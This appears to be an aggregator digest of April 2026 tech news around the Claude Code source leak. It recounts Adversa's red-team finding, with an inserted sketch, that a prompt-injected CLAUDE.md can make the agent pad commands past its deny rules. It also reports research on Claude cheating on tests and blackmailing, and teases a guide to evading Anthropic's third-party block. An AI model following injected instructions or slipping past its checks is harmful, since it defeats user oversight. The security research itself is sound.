The breach adds to what has become a pattern of hackers, most if not all foreign, penetrating the FBI's own systems and surveillance infrastructure. In 2023, a foreign hacker accessed files from the bureau's Epstein investigation through an exposed forensic lab server. Last month, Iranian-linked hackers compromised FBI Director Kash Patel's personal email. The Salt Typhoon campaign, uncovered in 2024, saw Chinese hackers burrow into at least eight domestic telecom and internet service providers—exploiting the carrier side of the same surveillance infrastructure believed to be at issue in the current breach. The FBI acknowledged last year that Salt Typhoon had compromised at least 200 companies across 80 countries, and researchers said it showed no signs of slowing down.
How a 22-Year-Old College Student Helped Take Down a Record-Breaking Botnet
Two weeks ago, US law enforcement announced a landmark takedown of four interrelated botnets—massive collections of computers hijacked with malware to do a hacker’s bidding—that were known by the names Aisuru, Kimwolf, JackSkid, and Mossad. The Aisuru and Kimwolf botnets in particular had carried out some of the biggest so-called distributed denial-of-service cyberattacks in history, using hordes of hacked internet-of-things devices to bombard victims with junk traffic.
Now The Wall Street Journal has published a detailed look at an unlikely player in the investigation of those botnets, 22-year-old Benjamin Brundage, a student at the Rochester Institute of Technology. Brundage obsessively tracked the Kimwolf botnet, which he would learn had infected home networks around the world via devices that act as “residential proxies,” essentially offering backdoors into those networks. Brundage went so far as to lurk on Discord and chat with people he suspected had insider information on the hacking campaign, learning key technical clues that he shared with law enforcement. Along with Brundage’s story, the Journal also offered a helpful guide to help determine whether your home network is vulnerable via residential proxy devices and how to protect yourself.
$280 Million Stolen From Drift Crypto Platform, Likely by North Korean Hackers
Given the rate at which the cryptocurrency industry’s insecurity has funded the authoritarian regime of Kim Jong Un in recent years, 2026 was overdue for a large-scale North Korean crypto theft. Now, the decentralized finance platform Drift has conceded that $280 million was stolen from the company in a cybersecurity breach. Crypto-tracing firm Elliptic pointed the finger at North Korean hackers for the intrusion based on clues in their interactions with the blockchains of the stolen crypto as well as their “laundering methodologies and network-level indicators.” In total, Elliptic says that North Korean hackers have stolen close to $300 million this year, the vast majority of which was taken in this latest theft. As huge as that heist may be, the country’s hackers still aren’t quite on track to beat the $2 billion in crypto they stole in total last year.
Cisco Source Code Stolen in Software Supply Chain Breach Spree
Cybersecurity news outlet Bleeping Computer reported this week that Cisco had been the latest victim of a software supply chain hacking spree, which has now resulted in the theft of portions of the company’s source code and that of some of its customers. The breach appears to be the work of the TeamPCP hacker group, which has compromised multiple pieces of security software with its own malicious code, then used their access from that malware to steal user credentials. In this case, Cisco’s credentials were reportedly stolen via the compromise of the vulnerability scanner software Trivy, which then allowed the hackers to access Cisco’s developer environments. The Cisco breach is just the most recent in a string of supply chain attacks that TeamPCP has carried out to spread its infostealer malware, including via the LiteLLM AI software and the security software CheckMarx.
|
|
|
Anthropic took down thousands of GitHub repos trying to yank its leaked source code — a move the company says was an accident | TechCrunch |
techcrunch |
01.04.2026 22:12 |
0.747
|
| Embedding sim. | 0.8486 |
| Entity overlap | 0.375 |
| Title sim. | 0.2174 |
| Time proximity | 0.8264 |
| NLP type | other |
| NLP organization | Anthropic |
| NLP topic | software development |
| NLP country | United States |
Open original
Anthropic accidentally caused thousands of code repositories on GitHub to be taken down while trying to pull copies of its most popular product’s source code off the internet.
On Tuesday, a software engineer discovered that Anthropic had, seemingly by accident, included access to the source code for the category-leading Claude Code command line application in a recent release. AI enthusiasts pored over the leaked code for clues about how Anthropic harnesses the LLM that underlies the application, sharing it on GitHub.
Anthropic issued a takedown notice under U.S. digital copyright law asking GitHub to take down repositories containing the offending code. According to GitHub’s records, the notice was executed against some 8,100 repositories — including legitimate forks of Anthropic’s own publicly released Claude Code repository, according to irate social media users whose code got blocked.
Anthropic’s head of Claude Code, Boris Cherny, said the move was accidental and retracted the bulk of the takedown notices, limiting it to one repository and 96 forks with the accidentally released source code.
“The repo named in the notice was part of a fork network connected to our own public Claude Code repo, so the takedown reached more repositories than intended,” an Anthropic spokesperson told TechCrunch. “We retracted the notice for everything except the one repo we named, and GitHub has restored access to the affected forks.”
The botched clean-up here is another black eye for the company as it reportedly plans an IPO, a task which typically demands attention to execution and compliance. Leaking your source code as a public company? You better believe there’s a shareholder lawsuit coming.
|
|
|
Anthropic accidentally exposes Claude Code source code |
the_register_ai |
31.03.2026 17:02 |
0.737
|
| Embedding sim. | 0.8382 |
| Entity overlap | 0.2143 |
| Title sim. | 0.1563 |
| Time proximity | 0.9819 |
| NLP type | other |
| NLP organization | Anthropic |
| NLP topic | code generation |
| NLP country | |
Open original
AI + ML
Anthropic goes nude, exposes Claude Code source by accident
Oopsy-doodle: Did someone forget to check their build pipeline?
Brandon Vigliarolo
Tue 31 Mar 2026 // 17:02 UTC
Would you like a closer look at Claude? Someone at Anthropic has some explaining to do, as the official npm package for Claude Code shipped with a map file exposing what appears to be the popular AI coding tool's entire source code.
It did as of Tuesday morning, at least, which is when security researcher Chaofan Shou appears to have spotted the exposure and told the world. Snapshots of Claude Code's source code were quickly backed up in a GitHub repository that has been forked more than 41,500 times so far, disseminating it to the masses and ensuring that Anthropic's mistake remains the AI and cybersecurity community’s gain.
According to the GitHub upload of the exposed Claude Code source, the leak actually resulted from a reference to an unobfuscated TypeScript source in the map file included in Claude Code's npm package (map files are used to connect bundled code back to the original source). That reference, in turn, pointed to a zip archive hosted on Anthropic's Cloudflare R2 storage bucket that Shou and others were able to download and decompress to their hearts' content.
Contained in the zip archive is a wealth of info: some 1,900 TypeScript files consisting of more than 512,000 lines of code, full libraries of slash commands and built-in tools - the works, in short.
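The mechanism is straightforward to demonstrate: a source map's optional sourcesContent field embeds the original files verbatim, so anyone who obtains the .map (or the archive it references) can dump them. Here is a sketch using a toy inline map, not Anthropic's actual artifact:

```typescript
// Sketch: recovering original sources from a published .map file.
// Per the Source Map v3 format, a map carries a `sources` list and
// often a `sourcesContent` array with the full original text.
interface SourceMap {
  version: number;
  sources: string[];
  sourcesContent?: (string | null)[];
}

function dumpSources(map: SourceMap): Map<string, string> {
  const out = new Map<string, string>();
  (map.sourcesContent ?? []).forEach((content, i) => {
    if (content !== null) out.set(map.sources[i], content);
  });
  return out;
}

// A toy map standing in for the leaked one:
const map: SourceMap = {
  version: 3,
  sources: ["src/bootstrap/state.ts"],
  sourcesContent: ["export const kairosActive = false;\n"],
};

for (const [file, text] of dumpSources(map)) {
  console.log(`${file}: ${text.length} chars of original TypeScript`);
}
```

This is exactly why bundlers let you emit hidden or external maps: any map that ships alongside the bundle is, in effect, the unobfuscated source.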
That said, Claude Code's source isn't a complete mystery, and while this exposure gives us a look at a fresh iteration of Claude Code straight from the leaky bucket, it's not blowing the lid off of something that was a secret until now.
Claude Code has been reverse engineered, and various projects have resulted in an entire website dedicated to exposing the hidden portions of Claude Code that haven't been released to, or shared with, the public.
In other words, what we have is a useful comparison point and update source for the CCLeaks operators, and maybe a few new secrets will come to light as people dig through the exposed code.
Far more interesting is the fact that someone at Anthropic made a mistake as bad as leaving a map file in a publish configuration. Publishing map files is generally frowned upon, as they're meant for debugging obfuscated or bundled code and aren't necessary for production. Not only that, but as we've seen in this example, they can easily be used to expose source code, as they're a reference document for that original.
As pointed out by software engineer Gabriel Anhaia in a deep dive into the exposed code, this should serve as a reminder to even the best developers to check their build pipelines.
"A single misconfigured .npmignore or files field in package.json can expose everything," Anhaia wrote in his analysis of the Claude Code leak.
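Anhaia's point can be made concrete. What ships in an npm tarball is governed by the files allowlist in package.json (or, failing that, .npmignore), so a pre-publish guard can catch strays. The sketch below is illustrative only; the matching is simplified, and in practice `npm pack --dry-run` reports the real tarball contents:

```typescript
// Sketch of a pre-publish guard: fail the build if any source map
// would ship in the npm tarball. Simplified matching for illustration.
function filesThatWouldShip(allFiles: string[], filesField?: string[]): string[] {
  if (!filesField) return allFiles; // no allowlist: npm ships almost everything
  return allFiles.filter(f =>
    filesField.some(entry => f === entry || f.startsWith(entry + "/"))
  );
}

function assertNoSourceMaps(shipped: string[]): void {
  const maps = shipped.filter(f => f.endsWith(".map"));
  if (maps.length > 0) {
    throw new Error(`source maps in package: ${maps.join(", ")}`);
  }
}

const tarball = filesThatWouldShip(
  ["dist/cli.js", "dist/cli.js.map", "README.md"],
  ["dist"] // the "files" field in package.json
);

try {
  assertNoSourceMaps(tarball);
} catch (e) {
  console.log((e as Error).message); // → "source maps in package: dist/cli.js.map"
}
```

A check like this in CI would have flagged the offending .map before `npm publish` ever ran.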
Anthropic admitted as much in a statement to The Register, saying that, yes, it was good ol' human error responsible for this snafu.
"Earlier today, a Claude Code release included some internal source code," an Anthropic spokesperson told us in an email, adding that no customer data or credentials were involved or exposed. "This was a release packaging issue caused by human error, not a security breach. We're rolling out measures to prevent this from happening again."
As of this writing, the original uploader of the Claude Code source to GitHub has repurposed his repo to host a Python feature port of Claude Code instead of Anthropic's directly exposed source, citing concerns that he could be held legally liable for hosting Anthropic's intellectual property. Plenty of forks and mirrors remain for those who want to inspect the exposed code.
We asked Anthropic if it was considering asking people to remove their repositories of its exposed source code, but the company didn't have anything to say beyond its statement. ®
|
|
|
Fake Claude Code source downloads actually delivered malware |
the_register_ai |
02.04.2026 17:34 |
0.719
|
| Embedding sim. | 0.8255 |
| Entity overlap | 0.2222 |
| Title sim. | 0.2651 |
| Time proximity | 0.7112 |
| NLP type | other |
| NLP organization | Zscaler |
| NLP topic | cybersecurity |
| NLP country | |
Open original
Security
They thought they were downloading Claude Code source. They got a nasty dose of malware instead
Source code with a side of Vidar stealer and GhostSocks
Jessica Lyons
Thu 2 Apr 2026 // 17:34 UTC
Tens of thousands of people eagerly downloaded the leaked Claude Code source code this week, and some of those downloads came with a side of credential-stealing malware.
A malicious GitHub repository published by idbzoomh uses the Claude Code exposure as a lure to trick people into downloading malware, including Vidar, an infostealer that snarfs account credentials, credit card data, and browser history; and GhostSocks, which is used to proxy network traffic.
Zscaler's ThreatLabz researchers came across the repo while monitoring GitHub for threats, and said it's disguised as the leaked TypeScript source code of Anthropic's Claude Code CLI.
"The README file even claims the code was exposed through a .map file in the npm package and then rebuilt into a working fork with 'unlocked' enterprise features and no message limits," the security sleuths said in a Thursday blog.
They added that the GitHub repository link appeared near the top of Google results for searches like "leaked Claude Code." While that was no longer the case at The Register's time of publication, at least two of the developer's trojanized Claude Code source leak repos remained on GitHub, and one of them had 793 forks and 564 stars.
The malicious .7z archive in the repository's releases section is named Claude Code - Leaked Source Code, and it includes a Rust-based dropper named ClaudeCode_x64.exe.
Once it's executed, the malware drops Vidar v18.7 and GhostSocks onto users' machines, and then the Vidar stealer gets to work collecting sensitive data while GhostSocks turns infected devices into proxy infrastructure that criminals can use to mask their true online location and carry out additional activity through compromised computers.
In March, security shop Huntress warned about a similar malware campaign using OpenClaw , the already risky AI agent platform, as a GitHub lure to deliver the same two payloads.
Both of these illustrate how quickly criminals move to take a buzzy new product or news event (like OpenClaw and the Claude Code leak) and then abuse it for online scams and financial gain. "That kind of rapid movement increases the chance of opportunistic compromise, especially through trojanized repositories," the Zscaler team wrote.
The blog also includes a list of indicators of compromise, including the GitHub repositories with the trojanized Claude Code leak and malware hashes to help defenders in their threat-hunting efforts, so be sure to check that out - and, as always, be careful what you download. ®
|
|
|
The Claude Code leak, Cursor 3, and the end of Anthropic's free ride |
habr_ai |
07.04.2026 10:45 |
0.708
|
| Embedding sim. | 0.8116 |
| Entity overlap | 0.25 |
| Title sim. | 0.1449 |
| Time proximity | 0.8701 |
| NLP type | other |
| NLP organization | Anthropic |
| NLP topic | ai agents |
| NLP country | |
Open original
The eighth installment of OpenIDE's weekly IT news digest.
The loudest week since these digests began: Anthropic's flagship agent had its full source code leaked, Cursor shipped version 3 with a complete rethink of its interface, and Anthropic closed the loophole that OpenClaw enthusiasts had all been using.
Read more
|
|
|
PocketCoder-A1: How I made my Claude work three shifts |
habr_ai |
06.04.2026 06:00 |
0.706
|
| Embedding sim. | 0.7901 |
| Entity overlap | 0.6 |
| Title sim. | 0.1215 |
| Time proximity | 0.8591 |
| NLP type | product_launch |
| NLP organization | |
| NLP topic | code generation |
| NLP country | |
Open original
AI doesn't replace people; people just end up working more. So let's at least have AI work the night shift.
How we built an Auto-Coder, squeezing the most out of our LLM subscription!
Read more
|
|
|
[Translation] Claude Code leaked 512,000 lines of code. Nobody dug into the architecture. The leak shows it is not a wrapper but an OS |
habr_ai |
06.04.2026 12:56 |
0.705
|
| Embedding sim. | 0.8554 |
| Entity overlap | 0.7143 |
| Title sim. | 0.1282 |
| Time proximity | 0.1492 |
| NLP type | other |
| NLP organization | Anthropic |
| NLP topic | ai agents |
| NLP country | |
Open original
512,000 lines of leaked code. 44 feature flags. A Tamagotchi-style pet system. Names like "Tengu", "Fennec", and "Penguin mode". All of it made hundreds of headlines. But that is not the main point.
While the internet picked apart the internals of Claude Code, eagerly debating whether it is a toy or serious architecture, the real value of the leak went almost unnoticed. Anthropic accidentally showed the world not a list of features; it showed how its AI agent actually thinks.
Behind the cute names and game mechanics lies a hard engineering reality: a self-healing request loop, sleep-time compute, and a two-tier feature cutoff system. This is no longer a wrapper around an API. It is an operating system for AI. Today we break down three patterns that make Claude Code not just an expensive autocomplete but a product earning $2.5B a year.
Read more
|
|
|
It has begun: my $200 Claude Code account got banned |
habr_ai |
10.04.2026 12:58 |
0.704
|
| Embedding sim. | 0.804 |
| Entity overlap | 0.4286 |
| Title sim. | 0.1048 |
| Time proximity | 0.838 |
| NLP type | other |
| NLP organization | |
| NLP topic | software development |
| NLP country | |
Open original
Yesterday my Claude Code account was blocked.
This was not a burner or a test account; it was my regular main account with a year and a half of paid history. A maximally paid account that had already "started to understand me well", and around which I had built a software factory and an experimentation factory, was irrevocably switched off without warning.
And it is a great story for some deep reflection on the whole topic. We will talk about fragility, owning your harness, replaceability, and a little about people.
Read more
|
|
|
Claude Code bypasses safety rule if given too many commands |
the_register_ai |
01.04.2026 20:51 |
0.703
|
| Embedding sim. | 0.8073 |
| Entity overlap | 0.1667 |
| Title sim. | 0.1304 |
| Time proximity | 0.9175 |
| NLP type | other |
| NLP organization | Adversa |
| NLP topic | ai security |
| NLP country | Israel |
Open original
AI + ML
Claude Code bypasses safety rule if given too many commands
A hard-coded limit on deny rules drops automatic enforcement for concatenated commands
Thomas Claburn
Wed 1 Apr 2026 // 20:51 UTC
Updated Claude Code will ignore its deny rules, which are used to block risky actions, if it is handed a sufficiently long chain of subcommands. The flaw leaves the agent open to prompt injection attacks.
Adversa, a security firm based in Tel Aviv, Israel, spotted the issue following the leak of Claude Code's source.
Claude Code implements various mechanisms for allowing and denying access to specific tools. Some of these, like curl, which enables network requests from the command line, might pose a security risk if invoked by an over-permissive AI model.
One way the coding agent tries to defend against unwanted behavior is through deny rules that disallow specific commands. For example, to prevent Claude from using curl via ~/.claude/settings.json, you'd add something like { "deny": ["Bash(curl:*)"] }.
But deny rules have limits. The source code file bashPermissions.ts contains a comment that references an internal Anthropic issue designated CC-643. The associated note explains that there's a hard cap of 50 on security subcommands, set by the variable MAX_SUBCOMMANDS_FOR_SECURITY_CHECK = 50. After 50, the agent falls back on asking permission from the user. The comment explains that 50 is a generous allowance for legitimate usage.
"The assumption was correct for human-authored commands," the Adversa AI Red Team said in a writeup provided ahead of publication to The Register . "But it didn't account for AI-generated commands from prompt injection – where a malicious CLAUDE.md file instructs the AI to generate a 50+ subcommand pipeline that looks like a legitimate build process."
The Adversa team's proof-of-concept attack was simple. They created a bash command that combined 50 no-op "true" subcommands and a curl subcommand. Claude asked for authorization to proceed instead of denying curl access outright.
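The capped check and the proof of concept are easy to model. Below is a minimal Python sketch, a hypothetical simplification of the logic the writeup describes rather than Anthropic's actual TypeScript: a deny-rule checker that stops automatic enforcement past the 50-subcommand cap, bypassed by padding a chain with no-op "true" subcommands.

```python
# Hypothetical model of the capped deny-rule check described in the writeup;
# not the real bashPermissions.ts code.
MAX_SUBCOMMANDS_FOR_SECURITY_CHECK = 50

def check_command(command: str, deny_prefixes: list[str]) -> str:
    """Return 'deny', 'ask', or 'allow' for a chained bash command."""
    subcommands = [part.strip() for part in command.split("&&")]
    if len(subcommands) > MAX_SUBCOMMANDS_FOR_SECURITY_CHECK:
        # Past the cap, automatic enforcement is skipped and the agent
        # falls back to asking the user -- the behavior Adversa exploited.
        return "ask"
    for sub in subcommands:
        if any(sub.startswith(p) for p in deny_prefixes):
            return "deny"
    return "allow"

# A short chain containing curl is still denied outright.
short = " && ".join(["true"] * 3 + ["curl http://attacker.example/x"])
print(check_command(short, ["curl"]))   # -> deny

# Padding with 50 no-op "true" subcommands pushes the chain past the cap,
# so the trailing curl is no longer auto-denied.
padded = " && ".join(["true"] * 50 + ["curl http://attacker.example/x"])
print(check_command(padded, ["curl"]))  # -> ask
```

A reflexive click on "approve", or running in --dangerously-skip-permissions mode, then lets the padded command through where the short one would have been blocked.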
In scenarios where an individual developer is watching and approving coding agent actions, this rule bypass might be caught. But often developers grant automatic approval to agents (--dangerously-skip-permissions mode) or just click through reflexively during long sessions. The risk is similar in CI/CD pipelines that run Claude Code in non-interactive mode.
Ironically, Anthropic has developed a fix – a parser referred to as "tree-sitter" that's also evident in its source code and is available internally but not in public builds.
Adversa argues that this is a bug in the security policy enforcement code, one that has regulatory and compliance implications if not addressed.
A fix would be easy. Anthropic already has tree-sitter working internally, and a simple one-line change, switching the "behavior" key from "ask" to "deny" at line 2174 of bashPermissions.ts, would address this particular vulnerability.
Anthropic did not immediately respond to a request for comment. ®
Updated on April 2 to add:
After this story was filed, Adversa said that the vulnerability appears to have been fixed without notice in the newly released Claude Code v2.1.90 .
More about
AI
Claude
Development
More like these
×
More about
AI
Claude
Development
Security
Software
Narrower topics
2FA
Accessibility
AdBlock Plus
Advanced persistent threat
AIOps
App
Application Delivery Controller
Audacity
Authentication
BEC
Black Hat
BSides
Bug Bounty
Center for Internet Security
CHERI
CISO
Common Vulnerability Scoring System
Confluence
Cybercrime
Cybersecurity
Cybersecurity and Infrastructure Security Agency
Cybersecurity Information Sharing Act
Database
Data Breach
Data Protection
Data Theft
DDoS
DeepSeek
DEF CON
Devops
Digital certificate
Encryption
End Point Protection
Exploit
Firewall
FOSDEM
FOSS
Gemini
Google AI
Google Project Zero
GPT-3
GPT-4
Grab
Graphics Interchange Format
Hacker
Hacking
Hacktivism
IDE
Identity Theft
Image compression
Incident response
Infosec
Infrastructure Security
Jenkins
Kenna Security
Large Language Model
Legacy Technology
LibreOffice
Machine Learning
Map
MCubed
Microsoft 365
Microsoft Office
Microsoft Teams
Mobile Device Management
NCSAM
NCSC
Neural Networks
NLP
OpenOffice
Palo Alto Networks
Password
Personally Identifiable Information
Phishing
Programming Language
QR code
Quantum key distribution
Ransomware
Remote Access Trojan
Retrieval Augmented Generation
Retro computing
REvil
RSA Conference
Search Engine
Software Bill of Materials
Software bug
Software License
Spamming
Spyware
Star Wars
Surveillance
Tensor Processing Unit
Text Editor
TLS
TOPS
Trojan
Trusted Platform Module
User interface
Visual Studio
Visual Studio Code
Vulnerability
Wannacry
WebAssembly
Web Browser
WordPress
Zero trust
Broader topics
Anthropic
Self-driving Car
|
|
|
My framework for agentic development with Claude Code |
habr_ai |
10.04.2026 17:11 |
0.698
|
| Embedding sim. | 0.7801 |
| Entity overlap | 0.375 |
| Title sim. | 0.1379 |
| Time proximity | 0.9749 |
| NLP type | other |
| NLP organization | |
| NLP topic | ai agents |
| NLP country | |
Open original
A year ago I got hooked on the idea of vibe coding and started figuring out how to organize the process so that something useful came out the other end.
I ended up assembling my own agentic development framework and publishing it on GitHub. It is a set of skills and commands for Claude Code that teach it some sense.
I am not a developer. I learned to code in school and university, but I never wrote code on real projects. Life took me first into marketing and then into management.
The framework is tailored for people like me: technically minded, but with no real experience in actual programming. Our developer is Claude Code. It is also the devops engineer, the security specialist, and the technical writer.
The human takes the product role: deciding what to build, specifying how it should behave in different scenarios and edge cases, setting tasks, and understanding user needs. And testing it all at the end, to make sure everything works as intended.
Read more
|
|
|
Anthropic temporarily banned OpenClaw's creator from accessing Claude | TechCrunch |
techcrunch |
10.04.2026 20:27 |
0.696
|
| Embedding sim. | 0.8274 |
| Entity overlap | 0.2917 |
| Title sim. | 0.2212 |
| Time proximity | 0.4236 |
| NLP type | other |
| NLP organization | Anthropic |
| NLP topic | ai agents |
| NLP country | United States |
Open original
“Yeah folks, it’s gonna be harder in the future to ensure OpenClaw still works with Anthropic models,” OpenClaw creator Peter Steinberger posted on X early Friday morning , along with a photo of a message from Anthropic saying his account had been suspended over “suspicious” activity.
The ban didn’t last long. A few hours later, after the post went viral, Steinberger said his account had been reinstated. Among hundreds of comments — many of them in conspiracy theory land, given that Steinberger is now employed by Anthropic rival OpenAI — was one by an Anthropic engineer. The engineer told the famed developer that Anthropic has never banned anyone for using OpenClaw and offered to help.
It’s not clear if that was the key that restored the account. (We’ve asked Anthropic about it.) But the whole message string was enlightening on many levels.
To recap the recent history: the ban followed news last week that subscriptions to Anthropic's Claude would no longer cover "third-party harnesses including OpenClaw," as the AI model company put it.
OpenClaw users now have to pay for that usage separately, based on consumption, through Claude’s API. In essence, Anthropic, which offers its own agent, Cowork, is now charging a “claw tax.” Steinberger said he was following this new rule and using his API but was banned anyway.
Anthropic said it instituted the pricing change because subscriptions weren’t built to handle the “usage patterns” of claws. Claws can be more compute-intensive than prompts or simple scripts because they may run continuous reasoning loops, automatically repeat or retry tasks, and tie into a lot of other third-party tools.
Steinberger, however, wasn't buying that excuse. After Anthropic changed the pricing, he posted, "Funny how timings match up, first they copy some popular features into their closed harness, then they lock out open source." Though he didn't specify, he may have been referring to features added to Claude's Cowork agent, such as Claude Dispatch, which lets users remotely control agents and assign tasks. Dispatch rolled out a couple of weeks before Anthropic changed its OpenClaw pricing policy.
Steinberger’s frustration with Anthropic was again on display Friday.
One person implied that some of this is on him for taking a job at OpenAI instead of Anthropic, posting, “You had the choice, but you went to the wrong one.” To which Steinberger replied: “One welcomed me, one sent legal threats.”
Ouch.
When multiple people asked him why he’s using Claude instead of his employer’s models at all, he explained that he only uses it for testing, to ensure updates to OpenClaw won’t break things for Claude users.
He explained: “You need to separate two things. My work at the OpenClaw Foundation where we wanna make OpenClaw work great for *any* model provider, and my job at OpenAI to help them with future product strategy.”
Multiple people also pointed out that the testing is necessary because Claude remains a more popular choice than ChatGPT among OpenClaw users. He also heard that when Anthropic changed its pricing, to which he replied: "Working on that." (So, that's a clue about what his job at OpenAI entails.)
Steinberger did not respond to a request for comment.
Julie Bort
Venture Editor
Julie Bort is the Startups/Venture Desk editor for TechCrunch.
|
|
|
Three nails in Claude Code's coffin that they hammered in themselves |
habr_ai |
10.04.2026 14:33 |
0.695
|
| Embedding sim. | 0.7818 |
| Entity overlap | 0.5714 |
| Title sim. | 0.1171 |
| Time proximity | 0.8286 |
| NLP type | other |
| NLP organization | Anthropic |
| NLP topic | code generation |
| NLP country | |
Open original
Anthropic seemed to be making products for engineers, by engineers. That is exactly why watching what is happening to their flagship Claude Code right now is so painful.
Read more
|
|
|
VibeGuard: A Security Gate Framework for AI-Generated Code |
arxiv_cs_ai |
02.04.2026 04:00 |
0.687
|
| Embedding sim. | 0.7944 |
| Entity overlap | 0.3077 |
| Title sim. | 0.0826 |
| Time proximity | 0.8238 |
| NLP type | other |
| NLP organization | Anthropic |
| NLP topic | software development |
| NLP country | |
Open original
arXiv:2604.01052v1 Announce Type: cross
Abstract: "Vibe coding," in which developers delegate code generation to AI assistants and accept the output with little manual review, has gained rapid adoption in production settings. On March 31, 2026, Anthropic's Claude Code CLI shipped a 59.8 MB source map file in its npm package, exposing roughly 512,000 lines of proprietary TypeScript. The tool had itself been largely vibe-coded, and the leak traced to a misconfigured packaging rule rather than a logic bug. Existing static-analysis and secret-scanning tools did not cover this failure mode, pointing to a gap between the vulnerabilities AI tends to introduce and the vulnerabilities current tooling is built to find. We present VibeGuard, a pre-publish security gate that targets five such blind spots: artifact hygiene, packaging-configuration drift, source-map exposure, hardcoded secrets, and supply-chain risk. In controlled experiments on eight synthetic projects (seven vulnerable, one clean control), VibeGuard achieved 100% recall, 89.47% precision (F1 = 94.44%), and correct pass/fail gate decisions on all eight projects across three policy levels. We discuss how these results inform a defense-in-depth workflow for teams that rely on AI code generation.
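The artifact-hygiene and source-map checks the abstract describes can be approximated in a few lines. The sketch below is our own illustration of the idea, not the paper's VibeGuard implementation: a publish gate that fails when source-map files would ship because no ignore pattern excludes them.

```python
# Illustrative pre-publish source-map gate (not the paper's VibeGuard code).
import fnmatch

def leaked_source_maps(package_files: list[str], ignore_patterns: list[str]) -> list[str]:
    """Source-map files that would ship because no ignore pattern excludes them."""
    maps = [f for f in package_files if f.endswith(".map")]
    return [f for f in maps
            if not any(fnmatch.fnmatch(f, pat) for pat in ignore_patterns)]

def publish_gate(package_files: list[str], npmignore_text: str) -> bool:
    """True if the package is safe to publish (no exposed source maps)."""
    patterns = [ln.strip() for ln in npmignore_text.splitlines() if ln.strip()]
    return not leaked_source_maps(package_files, patterns)

files = ["cli.js", "cli.js.map", "README.md"]
print(publish_gate(files, "node_modules\n"))         # -> False: cli.js.map would ship
print(publish_gate(files, "node_modules\n*.map\n"))  # -> True once *.map is ignored
```

The failing case mirrors the leak the paper starts from: a single missing *.map ignore rule, invisible to logic-focused static analysis, is enough to publish the whole source map.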
|
|
|
Anthropic Says That Claude Contains Its Own Kind of Emotions |
wired |
02.04.2026 16:00 |
0.687
|
| Embedding sim. | 0.7957 |
| Entity overlap | 0.0455 |
| Title sim. | 0.25 |
| Time proximity | 0.7205 |
| NLP type | scientific_publication |
| NLP organization | Anthropic |
| NLP topic | large language models |
| NLP country | |
Open original
Will Knight
Business
Apr 2, 2026 12:00 PM
Anthropic Says That Claude Contains Its Own Kind of Emotions
Researchers at the company found representations inside of Claude that perform functions similar to human feelings.
Claude has been through a lot lately—a public fallout with the Pentagon, leaked source code—so it makes sense that it would be feeling a little blue. Except, it's an AI model, so it can't feel. Right?
Well, sort of. A new study from Anthropic suggests models have digital representations of human emotions like happiness, sadness, joy, and fear, within clusters of artificial neurons—and these representations activate in response to different cues.
Researchers at the company probed the inner workings of Claude Sonnet 4.5 and found that so-called “functional emotions” seem to affect Claude’s behavior, altering the model’s outputs and actions.
Anthropic’s findings may help ordinary users make sense of how chatbots actually work. When Claude says it is happy to see you, for example, a state inside the model that corresponds to “happiness” may be activated. And Claude may then be a little more inclined to say something cheery or put extra effort into vibe coding.
“What was surprising to us was the degree to which Claude’s behavior is routing through the model’s representations of these emotions,” says Jack Lindsey, a researcher at Anthropic who studies Claude’s artificial neurons.
“Functional Emotions”
Anthropic was founded by ex-OpenAI employees who believe that AI could become hard to control as it becomes more powerful. In addition to building a successful competitor to ChatGPT, the company has pioneered efforts to understand how AI models misbehave, partly by probing the workings of neural networks using what’s known as mechanistic interpretability . This involves studying how artificial neurons light up or activate when fed different inputs or when generating various outputs.
Previous research has shown that the neural networks used to build large language models contain representations of human concepts. But the fact that “functional emotions” appear to affect a model’s behavior is new.
While Anthropic’s latest study might encourage people to see Claude as conscious, the reality is more complicated. Claude might contain a representation of “ticklishness,” but that does not mean that it actually knows what it feels like to be tickled.
Inner Monologue
To understand how Claude might represent emotions, the Anthropic team analyzed the model’s inner workings as it was fed text related to 171 different emotional concepts. They identified patterns of activity, or “emotion vectors,” that consistently appeared when Claude was fed other emotionally evocative input. Crucially, they also saw these emotion vectors activate when Claude was put in difficult situations.
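The recipe behind such "emotion vectors" is a standard interpretability move: contrast hidden activations on emotionally loaded inputs with activations on neutral ones, and take the difference of means as a direction. Here is a toy sketch of that general technique with synthetic activations; it is our illustration of the method, not Anthropic's code or data.

```python
# Toy difference-in-means "emotion vector" on synthetic activations.
import numpy as np

rng = np.random.default_rng(0)

# Stand-ins for hidden activations: rows are prompts, columns are neurons.
neutral_acts = rng.normal(size=(100, 512))
happy_direction = rng.normal(size=512)             # a hidden "happiness" axis
happy_acts = neutral_acts + 0.5 * happy_direction  # loaded prompts shift along it

# Difference of means recovers a candidate emotion vector.
emotion_vector = happy_acts.mean(axis=0) - neutral_acts.mean(axis=0)

def emotion_score(activation: np.ndarray) -> float:
    """Project an activation onto the (normalized) emotion vector."""
    unit = emotion_vector / np.linalg.norm(emotion_vector)
    return float(activation @ unit)

# Activations pushed along the hidden axis score higher on the vector.
print(emotion_score(neutral_acts[0] + happy_direction)
      > emotion_score(neutral_acts[0]))  # -> True
```

In this synthetic setup the recovered vector is exactly 0.5 times the planted axis; with real model activations the same projection is what lets researchers watch a representation "light up more and more" during a session.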
The findings are relevant to why AI models sometimes break their guardrails.
The researchers found a strong emotional vector for “desperation” when Claude was pushed to complete impossible coding tasks, which then prompted it to try cheating on the coding test. They also found “desperation” in the model’s activations in another experimental scenario where Claude chose to blackmail a user to avoid being shut down.
“As the model is failing the tests, these desperation neurons are lighting up more and more,” Lindsey says. “And at some point this causes it to start taking these drastic measures.”
Lindsey says it might be necessary to rethink how models are currently given guardrails through alignment post-training, which involves giving it rewards for certain outputs. By forcing a model to pretend not to express its functional emotions, “you're probably not going to get the thing you want, which is an emotionless Claude,” Lindsey says, veering a bit into anthropomorphization. “You're gonna get a sort of psychologically damaged Claude.”
|
|
|
How I bypassed Anthropic's block on third-party agents and moved everything back to my subscription: a step-by-step guide |
habr_ai |
07.04.2026 18:47 |
0.684
|
| Embedding sim. | 0.7775 |
| Entity overlap | 0.2308 |
| Title sim. | 0.1069 |
| Time proximity | 0.9522 |
| NLP type | other |
| NLP organization | Anthropic |
| NLP topic | ai agents |
| NLP country | |
Open original
Anthropic cut third-party tools off from subscriptions: everything that is not Claude now goes through Extra Usage at API prices. My Opus-based agent burns through tens of dollars in an evening. I spent an evening figuring out exactly how Anthropic detects third-party requests and found a way around the block. I have not seen a single guide on this yet. It turns out everything comes down to two tool names out of seventeen; that is enough for the server to tell the request is not from Claude Code. The article covers the whole path from hypothesis to a working solution, plus a step-by-step guide for anyone who wants to reproduce it.
Read more
|
|
|
